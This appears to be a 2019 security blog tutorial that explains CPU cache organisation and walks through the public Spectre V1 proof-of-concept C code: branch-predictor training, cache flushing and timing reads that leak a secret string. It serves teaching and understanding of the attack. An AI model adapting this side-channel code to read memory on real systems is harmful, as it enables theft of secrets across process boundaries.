-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathspectre_v1.html
453 lines (423 loc) · 44.4 KB
/
spectre_v1.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta name="author" content="F3real" />
<meta name="keywords" content="spectre,cache" />
<meta name="description" content="How spectre V1 works" />
<title>Spectre V1 - EnSec blog</title>
<link href="https://f3real.github.io/theme/css/combined.css" rel="stylesheet" />
<!-- Feeds -->
</head>
<body data-spy="scroll" data-target="#scrollspy">
<div id="wrapper">
<!-- Sidebar -->
<nav id="sidebar-wrapper-small" class="twitchy-background">
<ul id="accordion-small" class="sidebar-nav sidebar-nav-small">
<li>
<a href="https://f3real.github.io" title="EnSec blog" class="collapsed">
<span class="fas fa-home"></span>
</a>
</li>
<li class="nav-divider"></li>
<li>
<a href="https://f3real.github.io/archives.html" title="Recent Articles" class="collapsed">
<span class="fas fa-th-list"></span>
</a>
</li>
<li class="nav-divider"></li>
<li>
<a data-toggle="collapse" data-parent="#accordion-small" href="#collapse-social-small" title="Social" class="collapsed">
<i class="fas fa-users padding-small"></i>
</a>
</li>
<li class="panel anti-panel"><ul id="collapse-social-small" class="collapse ">
<li>
<a href="https://github.com/F3real" title="Github"><i class="fab fa-github-square padding-small"></i></a>
</li>
<li>
<a href="https://www.linkedin.com/in/stefan-ili%C4%87-61a004111" title="Linkedin"><i class="fab fa-linkedin padding-small"></i></a>
</li>
</ul></li>
<li class="nav-divider"></li>
<li>
<a href="#" title="Back to top" class="collapsed">
<span class="fas fa-arrow-up"></span>
</a>
</li>
</ul>
</nav>
<nav id="sidebar-wrapper" class="twitchy-background">
<ul id="accordion" class="sidebar-nav">
<li class="sidebar-brand">
<a href="https://f3real.github.io/">
<span class="fas fa-home padding-small"></span>
EnSec blog
</a>
</li>
<li>
<a href="https://f3real.github.io/archives.html">
<span class="fas fa-th-list padding-small"></span>
Archives
</a>
</li>
<li class="nav-divider"></li>
<li>
<a data-toggle="collapse" data-parent="#accordion" href="#collapse-social">
<i class="fas fa-users padding-small"></i>
Contact
</a>
</li>
<li class="panel anti-panel"><ul id="collapse-social" class="sidebar_submenu collapse ">
<li>
<a href="https://github.com/F3real" title="Github">
<i class="fab fa-github-square padding-small"></i>
Github
</a>
</li>
<li>
<a href="https://www.linkedin.com/in/stefan-ili%C4%87-61a004111" title="Linkedin">
<i class="fab fa-linkedin padding-small"></i>
Linkedin
</a>
</li>
</ul></li>
<li class="nav-divider"></li>
<li class="panel anti-panel"><ul id="collapse-pages" class="sidebar_submenu collapse ">
</ul></li>
<li class="nav-divider"></li>
<li>
<a data-toggle="collapse" data-parent="#accordion" href="#collapse-categories">
<i class="fas fa-folder-open padding-small"></i>
Categories
</a>
</li>
<li class="panel anti-panel"><ul id="collapse-categories" class="sidebar_submenu collapse ">
<li >
<a href="https://f3real.github.io/category/ctf.html">
<i class="fas fa-folder-open padding-small"></i>
ctf
<span class="badge badge-secondary float-right categorybadge">28</span>
</a>
</li>
<li >
<a href="https://f3real.github.io/category/misc.html">
<i class="fas fa-folder-open padding-small"></i>
misc
<span class="badge badge-secondary float-right categorybadge">15</span>
</a>
</li>
<li >
<a href="https://f3real.github.io/category/reversing.html">
<i class="fas fa-folder-open padding-small"></i>
reversing
<span class="badge badge-secondary float-right categorybadge">6</span>
</a>
</li>
<li class="active">
<a href="https://f3real.github.io/category/tutorial.html">
<i class="fas fa-folder-open padding-small"></i>
tutorial
<span class="badge badge-secondary float-right categorybadge">5</span>
</a>
</li>
</ul></li>
</ul>
</nav>
<!-- /#sidebar-wrapper -->
<!-- open/close sidebar -->
<button onclick="toggleMenu();return false;" class="btn btn-primary" id="menu-toggle">
<span id="right-arrow" class="fas fa-chevron-right" title="expand sidebar"></span>
<span id="left-arrow" class="fas fa-chevron-left" title="minimize sidebar"></span>
</button>
<!-- /open/close sidebar -->
<!-- Page Content -->
<div id="page-content-wrapper">
<div class="container-fluid">
<section id="content">
<article>
<div class="row">
<div class="col-lg-10">
<header class="page-header">
<h1>
<a href="https://f3real.github.io/spectre_v1.html"
rel="bookmark"
title="Permalink to Spectre V1">
Spectre V1
</a>
<small>
<div class="post-info">
<div class="publish-info-block">
<small>
<span class="published">
<i class="fa fa-calendar padding-small"></i><time datetime="2019-04-21T10:01:00+02:00"> Sun 21 April 2019</time>
</span>
<span class="category">
<i class="fa fa-folder-open padding-small"></i><a href="https://f3real.github.io/category/tutorial.html">tutorial</a>
</span>
<span class="tags">
<i class="fa fa-tags padding-small"></i>
<a href="https://f3real.github.io/tag/spectre.html">spectre</a> / <a href="https://f3real.github.io/tag/cache.html">cache</a> </span>
</small>
</div>
</div><!-- /.post-info --> </small>
</h1>
</header>
</div>
</div>
<div class="row">
<div class="col-lg-10">
<div class="entry-content">
<p>There are multiple spectre variants, but we will take look only at POC of V1 and try to understand it. But first, let's take a look at how CPU cache works:</p>
<div class="toc">
<ul>
<li><a href="#cpu-cache">CPU cache</a></li>
<li><a href="#spectre-v1">Spectre V1</a></li>
</ul>
</div>
<h2 id="cpu-cache">CPU cache</h2>
<p>CPUs usually have 3 cache levels (L1, L2 and L3). Accessing a higher cache level takes longer (more latency). There can also be different caches for memory and instructions for example: L1 data cache (d-cache) and L1 instruction cache (i-cache).
Data is transferred between memory and cache in blocks of fixed size, called <code>cache lines</code> or <code>cache blocks</code>. Cache line size is in power of 2 (usually between 16 and 128 bytes). <code>Cache set</code> is a 'row' in a cache containing multiple cache blocks depending on layout.</p>
<p>To map memory addresses to cache entry we split it into three different parts:</p>
<div class="highlight"><pre><span></span><code> +---------------------------------------------------------+
| TAG | SET INDEX | OFFSET |
+---------------------------------------------------------+
</code></pre></div>
<p>Getting data from cache follows the following algorithm:</p>
<ol>
<li>Use the <code>set index</code> to identify which cache set the address should reside in.</li>
<li>For cache, each block in the corresponding cache set, compare the <code>tag</code> associated with that block to the tag from the requested memory address. If there is a match, proceed to the next step. Otherwise, the data is not in the cache.</li>
<li>For the block where the data was found, look at a valid bit. If it is 1, the data is in the cache and we have a <code>cache hit</code>, otherwise it is not. </li>
</ol>
<p><code>Offset</code> part of the request address is used to select a portion of the matching cache line.
If we fail to find data in the cache we have a <code>cache miss</code>. In this case, the procedure is repeated to attempt to retrieve the data from the next cache levels, and finally external memory.</p>
<p>If cache block size is <code>B</code> (B being smallest addressable unit), then we need b bits for <code>offset</code> part of address:</p>
<p><img alt="Formula for calculating offset size" class="img-fluid centerimage" src="https://f3real.github.io/images/2019_4_23_equation1.svg"></p>
<p>If <code>S</code> is the number of sets in our cache, then the <code>set index</code> has s bits:</p>
<p><img alt="Formula for calculating set index size" class="img-fluid centerimage" src="https://f3real.github.io/images/2019_4_23_equation2.svg"></p>
<p>Remaining bits are used for <code>tag</code>
.
If each set contains k lines then we say that the cache is k-way associative.
<code>Direct mapped</code> cache has one line in each set (1-way associative).
<code>Fully-associative</code> cache has only one set, and thus don't use set bits.</p>
<p>If the requested address is not found in the cache, then it will be brought in from memory along with the data near it (to take advantage of spatial locality) and placed there. To determine which addresses will also be brought in, we find the starting and ending address of the range that will be brought in. The starting address can be found by “zeroing out” the block offset part of the address. For the ending address, we replace the block offset with all 1’s. Note that the size of this range will always be the size of a cache block. The data in that range will be brought in and placed in one of the blocks in the cache.
If no blocks are free, some of the old data will be evicted from the cache to make space.</p>
<h2 id="spectre-v1">Spectre V1</h2>
<p>Spectre V1 is based on exploiting conditional branch misprediction.
Full spectre paper can be found <a href="https://spectreattack.com/spectre.pdf">here</a>.</p>
<p>In general spectre attacks use the fact that processor can speculatively execute code that it shouldn't and even after the results of executing it are reverted, side effects of execution are left behind which can be exploited to leak data.</p>
<p>Branch prediction helps processors increase performance, but also makes processors speculatively execute code. Processors use Branch Target Buffer (BTB) which keeps a mapping from addresses of recently executed branch instructions to destination addresses to improve prediction.</p>
<p>For V1 attacker first starts with a training branch predictor so that it will make the wrong prediction later on. After this training phase attacker makes processor access out of bound value and load data to cache based on it. Measuring time to access data we can check what was loaded in the cache and leak it.</p>
<p>Let's look at POC:</p>
<p>First we have few defined global variables:</p>
<div class="highlight"><pre><span></span><code><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">array1_size</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">16</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="w"> </span><span class="n">unused1</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="kt">uint8_t</span><span class="w"> </span><span class="n">array1</span><span class="p">[</span><span class="mi">160</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="p">,</span><span class="mi">7</span><span class="p">,</span><span class="mi">8</span><span class="p">,</span><span class="mi">9</span><span class="p">,</span><span class="mi">10</span><span class="p">,</span><span class="mi">11</span><span class="p">,</span><span class="mi">12</span><span class="p">,</span><span class="mi">13</span><span class="p">,</span><span class="mi">14</span><span class="p">,</span><span class="mi">15</span><span class="p">,</span><span class="mi">16</span><span class="p">};</span>
<span class="kt">uint8_t</span><span class="w"> </span><span class="n">unused2</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="kt">uint8_t</span><span class="w"> </span><span class="n">array2</span><span class="p">[</span><span class="mi">256</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">512</span><span class="p">];</span><span class="w"> </span><span class="cm">/* 1 Mb */</span>
<span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">secret</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"The Magic Words are Squeamish Ossifrage."</span><span class="p">;</span>
</code></pre></div>
<p>Unused arrays serve as padding ensuring that data around them falls into different cache lines (L1 cache often has 64 byte lines). <code>Secret</code> array represents information we are trying to leak and <code>array1</code> represent memory attacker has access to (shared between the attacker and target). The size of <code>array1</code> is not important.</p>
<div class="highlight"><pre><span></span><code><span class="kt">uint8_t</span><span class="w"> </span><span class="n">temp</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="cm">/* Used so compiler won’t optimize out victim_function() */</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">victim_function</span><span class="p">(</span><span class="kt">size_t</span><span class="w"> </span><span class="n">x</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">x</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">array1_size</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">temp</span><span class="w"> </span><span class="o">&=</span><span class="w"> </span><span class="n">array2</span><span class="p">[</span><span class="n">array1</span><span class="p">[</span><span class="n">x</span><span class="p">]</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">512</span><span class="p">];</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>Victim function accesses memory based on attacker provided <code>x</code>. In case that
branch predictor makes the wrong prediction, the process will start executing <code>if</code> even with out-of-bounds <code>x</code>. This will load <code>array2[array1[x] * 512]</code> in the cache (in case of out-of-bounds <code>x</code>, value loaded in cache will depend on some secret byte <code>k</code>).</p>
<p>The attacker needs to make sure that <code>array1_size</code> and <code>array2</code> are uncached.
If <code>array1_size</code> is uncached, it will cause a delay in the evaluation of branch condition while the value is being fetched from memory. This delay can be substantial so instead of waiting for results to be determined, the processor will start executing code speculatively based on branch predictor (which is trained by an attacker to assume that branch is taken). Reading <code>array2[array1[x] * 512]</code> also takes time (due to cache miss). While this is happening processor may evaluate branch prediction, realise it made mistake and rewind state, but value loaded from <code>array2</code> will remain in the cache. The attacker needs to make sure <code>array2</code> was uncached so that he can deduce <code>k</code> based on what value was loaded in the cache.</p>
<p>We use <code>512</code> as array stride, this way we access different cache lines.</p>
<p>Next, we have <code>readMemoryByte</code> function which tries to leverage <code>victim_function</code> and leak secret data.</p>
<div class="highlight"><pre><span></span><code><span class="cm">/* Report best guess in value[0] and runner-up in value[1] */</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">readMemoryByte</span><span class="p">(</span><span class="kt">size_t</span><span class="w"> </span><span class="n">malicious_x</span><span class="p">,</span><span class="w"> </span><span class="kt">uint8_t</span><span class="w"> </span><span class="n">value</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">score</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">tries</span><span class="p">,</span><span class="w"> </span><span class="n">i</span><span class="p">,</span><span class="w"> </span><span class="n">j</span><span class="p">,</span><span class="w"> </span><span class="n">k</span><span class="p">,</span><span class="w"> </span><span class="n">mix_i</span><span class="p">,</span><span class="w"> </span><span class="n">junk</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">training_x</span><span class="p">,</span><span class="w"> </span><span class="n">x</span><span class="p">;</span>
<span class="w"> </span><span class="k">register</span><span class="w"> </span><span class="kt">uint64_t</span><span class="w"> </span><span class="n">time1</span><span class="p">,</span><span class="w"> </span><span class="n">time2</span><span class="p">;</span>
<span class="w"> </span><span class="k">volatile</span><span class="w"> </span><span class="kt">uint8_t</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">addr</span><span class="p">;</span>
<span class="w"> </span><span class="cm">/* Initialize result table*/</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">256</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">tries</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">999</span><span class="p">;</span><span class="w"> </span><span class="n">tries</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">tries</span><span class="o">--</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="cm">/* Flush array2[256*(0..255)] from cache */</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">256</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="w"> </span><span class="n">_mm_clflush</span><span class="p">(</span><span class="o">&</span><span class="n">array2</span><span class="p">[</span><span class="n">i</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">512</span><span class="p">]);</span><span class="w"> </span><span class="cm">/* intrinsic for clflush instruction */</span>
<span class="w"> </span><span class="cm">/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */</span>
<span class="w"> </span><span class="n">training_x</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">tries</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="n">array1_size</span><span class="p">;</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">j</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">29</span><span class="p">;</span><span class="w"> </span><span class="n">j</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">j</span><span class="o">--</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">_mm_clflush</span><span class="p">(</span><span class="o">&</span><span class="n">array1_size</span><span class="p">);</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="k">volatile</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">z</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">z</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">100</span><span class="p">;</span><span class="w"> </span><span class="n">z</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{}</span><span class="w"> </span><span class="cm">/* Delay (can also mfence) */</span>
<span class="w"> </span><span class="cm">/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */</span>
<span class="w"> </span><span class="cm">/* Avoid jumps in case those tip off the branch predictor */</span>
<span class="w"> </span><span class="n">x</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">((</span><span class="n">j</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">6</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="o">~</span><span class="mh">0xFFFF</span><span class="p">;</span><span class="w"> </span><span class="cm">/* Set x=FFF.FF0000 if j%6==0, else x=0 */</span>
<span class="w"> </span><span class="n">x</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">x</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="p">(</span><span class="n">x</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="mi">16</span><span class="p">));</span><span class="w"> </span><span class="cm">/* Set x=-1 if j&6=0, else x=0 */</span>
<span class="w"> </span><span class="n">x</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">training_x</span><span class="w"> </span><span class="o">^</span><span class="w"> </span><span class="p">(</span><span class="n">x</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="p">(</span><span class="n">malicious_x</span><span class="w"> </span><span class="o">^</span><span class="w"> </span><span class="n">training_x</span><span class="p">));</span>
<span class="w"> </span><span class="cm">/* Call the victim! */</span>
<span class="w"> </span><span class="n">victim_function</span><span class="p">(</span><span class="n">x</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="cm">/* Time reads. Order is lightly mixed up to prevent stride prediction */</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">256</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">mix_i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">((</span><span class="n">i</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">167</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">13</span><span class="p">)</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mi">255</span><span class="p">;</span>
<span class="w"> </span><span class="n">addr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">&</span><span class="n">array2</span><span class="p">[</span><span class="n">mix_i</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">512</span><span class="p">];</span>
<span class="w"> </span><span class="n">time1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">__rdtscp</span><span class="p">((</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">junk</span><span class="p">);</span><span class="w"> </span><span class="cm">/* READ TIMER */</span>
<span class="w"> </span><span class="n">junk</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">addr</span><span class="p">;</span><span class="w"> </span><span class="cm">/* MEMORY ACCESS TO TIME */</span>
<span class="w"> </span><span class="n">time2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">__rdtscp</span><span class="p">((</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">junk</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">time1</span><span class="p">;</span><span class="w"> </span><span class="cm">/* READ TIMER & COMPUTE ELAPSED TIME */</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">time2</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="n">CACHE_HIT_THRESHOLD</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">mix_i</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">array1</span><span class="p">[</span><span class="n">tries</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="n">array1_size</span><span class="p">])</span>
<span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="n">mix_i</span><span class="p">]</span><span class="o">++</span><span class="p">;</span><span class="w"> </span><span class="cm">/* cache hit - add +1 to score for this value */</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="cm">/* Locate highest & second-highest results results tallies in j/k */</span>
<span class="w"> </span><span class="n">j</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">-1</span><span class="p">;</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">256</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">j</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="n">j</span><span class="p">])</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">j</span><span class="p">;</span>
<span class="w"> </span><span class="n">j</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">i</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">k</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="n">k</span><span class="p">])</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">i</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">results</span><span class="p">[</span><span class="n">j</span><span class="p">]</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="p">(</span><span class="mi">2</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="n">k</span><span class="p">]</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">5</span><span class="p">)</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="p">(</span><span class="n">results</span><span class="p">[</span><span class="n">j</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="n">k</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">))</span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"> </span><span class="cm">/* Clear success if best is > 2*runner-up + 5 or 2/0) */</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">^=</span><span class="w"> </span><span class="n">junk</span><span class="p">;</span><span class="w"> </span><span class="cm">/* use junk so code above won’t get optimized out*/</span>
<span class="w"> </span><span class="n">value</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">uint8_t</span><span class="p">)</span><span class="n">j</span><span class="p">;</span>
<span class="w"> </span><span class="n">score</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="n">j</span><span class="p">];</span>
<span class="w"> </span><span class="n">value</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">uint8_t</span><span class="p">)</span><span class="n">k</span><span class="p">;</span>
<span class="w"> </span><span class="n">score</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">results</span><span class="p">[</span><span class="n">k</span><span class="p">];</span>
<span class="p">}</span>
</code></pre></div>
<p>Let's look at some parts in more depth:</p>
<p>We start setting up the attack by clearing the entire <code>array2</code> from the cache. We use 256 as a number of values since that's covers all possible byte values. </p>
<blockquote>
<p>_mm_clflush - Invalidate and flush the cache line that contains p from all levels of the cache hierarchy.</p>
</blockquote>
<div class="highlight"><pre><span></span><code><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">256</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="w"> </span><span class="n">_mm_clflush</span><span class="p">(</span><span class="o">&</span><span class="n">array2</span><span class="p">[</span><span class="n">i</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">512</span><span class="p">]);</span><span class="w"> </span><span class="cm">/* intrinsic for clflush instruction */</span>
</code></pre></div>
<p>After this, we make call victim function 5 times with the correct index (making branch predictor think it will be taken next time as well). After the training part, we call the victim function with our <code>malicious_x</code> index. Before calls to the victim, we also flush <code>array1_size</code> which finishes setting up our attack.
We repeat this procedure a few times to increase confidence in our guess.</p>
